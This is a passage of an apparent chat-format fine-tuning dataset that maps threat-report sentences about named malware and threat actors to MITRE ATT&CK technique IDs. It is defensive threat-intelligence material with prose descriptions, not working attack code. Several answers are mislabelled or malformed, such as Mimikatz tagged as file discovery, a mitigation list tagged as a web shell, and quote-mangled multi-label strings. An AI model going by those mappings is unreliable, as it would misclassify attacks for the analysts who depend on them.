- {
- "role": "user",
- "content": "DustySky can delete files it creates from the infected system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpyNote RAT is capable of performing a variety of alarming functions that includes: Activating the device’s microphone and listening to live conversations Executing commands on the device Copying files from the device to a Command & Control (C&C) center Recording screen captures Viewing contacts Reading SMS messages The screenshot below shows part of the sandbox’s report on the SpyNote RAT’s signature and detected functions: Figure 1 : Zscaler Cloud Sandbox Detection The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder, which was leaked last year"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1083 - File and Directory Discovery', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started"
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection"
- },
- {
- "role": "assistant",
- "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can determine the time on the victim machine via IPinfo."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT can communicate over multiple C2 host and port combinations."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used process hollowing to inject into child processes."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer has used Process Doppelgänging to evade security software while deploying tools on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1055.013 - Process Doppelgänging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While both malware families are designed to deploy Cobalt Strike Beacon, there are differences in Cobalt Strike configuration. To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol"
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has made their XMRIG payloads persistent as a Windows Service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kerrdown has been distributed through malicious e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sys10 uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBK has the ability to use the \"CreatePipe\" API to add a sub-process for execution via cmd."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1554 - Compromise Host Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These files are stored within an 217kb encrypted cab file in the dropper’s resources under the name “A”"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. Below shows the RC4 key \"sV. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate has used `InstallUtil.exe` as part of its process to disable Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As with much of the malware distributed by TA505, The Trick has appeared in frequent, high-volume campaigns. The campaigns used a mix of attached zipped scripts (WSF, VBS), malicious Microsoft Office documents (Word, Excel), HTML attachments, password-protected Microsoft Word documents, links to malicious JavaScript, and other vectors. The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can dump the SAM database."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 5 Uploading a file to server via RGDoor Downloading a file from the server via RGDoor"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can Base64 encode system information sent to C2."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1559.001 - Component Object Model', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can XOR encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of performing process listings."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has scanned for vulnerabilities in the public-facing servers of their targets."
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell has the ability to create reverse shells with Perl scripts."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pay2Key can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes is capable of downloading files, including additional modules."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard can use `cmd.exe` for execution on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has lured victims to launch malicious attachments delivered via spearphishing emails (often sent from compromised accounts)."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. An example of this can be seen in Figure 6 below, which shows QakBot decrypting a string containing the value for lpProcName passed as a parameter to the GetProcAddress API call. The selected function, which has been labeled in IDA Pro as, “oc_clear_mem” deletes the string memory right after it retrieves the process address"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer deobfuscates its strings and APIs once its executed."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise executes \"systeminfo\" after initial communication is made to the remote server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has disabled Windows Defender to evade protections."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro can communicate with its C2 using HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During CostaRicto, the threat actors employed nmap and pscan to scan target environments."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the custom tools used by the Leafminer group is a rebranded version of the widespread post-exploitation tool Mimikatz"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda modifies several Registry keys under \"HKCU\\Software\\Microsoft\\Internet Explorer\\ PhishingFilter\\\" to disable phishing filters."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used SMTP as a communication channel in various implants, initially using self-registered Google Mail accounts and later compromised email servers of its victims. Later implants such as use a blend of HTTP and other legitimate channels, depending on module configuration."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has cleared command history with \"history -c\"."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal on Host: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has used the ShellExecuteW() function call."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After all of the data is gathered, the malware starts communication with the C&C server by periodically sending HTTP POST requests to the following URL on the received domain"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can check for the existence of user email addresses using public Microsoft APIs."
- },
- {
- "role": "assistant",
- "content": "T1589.002 - Email Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. This technique has been documented in the MITRE ATT&CK knowledge base as CMSTP; an example of how this technique is used may be found here. This technique has been used in the past by Cobalt, another financially motivated group. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DownPaper uses PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Typical web servers and applications only require GET, POST, and HEAD.Where possible, minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number.Secure both the operating system and the application.Update and patch production servers regularly.Disable potentially harmful SQL-stored procedure calls.Sanitize and validate input to ensure that it is properly typed and does not contain escaped code.Consider using type-safe stored procedures and prepared statements.Audit transaction logs regularly for suspicious activity.Perform penetration testing on web services.Ensure error messages are generic and do not expose too much information.Permissions, Privileges, and Access ControlsSystem operators should take the following steps to limit permissions, privileges, and access controls.Reduce privileges to only those needed for a user’s duties.Restrict users’ ability (permissions) to install and run unwanted software applications, and apply the principle of “Least Privilege” to all systems and services"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Transparent Tribe has set up websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools."
- },
- {
- "role": "assistant",
- "content": "T1608.004 - Drive-by Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used web shells, often to maintain access to a victim network."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel can download files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM can capture screenshots of the victim’s desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lateral Movement APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP)"
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RunningRAT contains code to delete files from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process \"/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment\"."
- },
- {
- "role": "assistant",
- "content": "T1056.002 - Input Capture: GUI Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
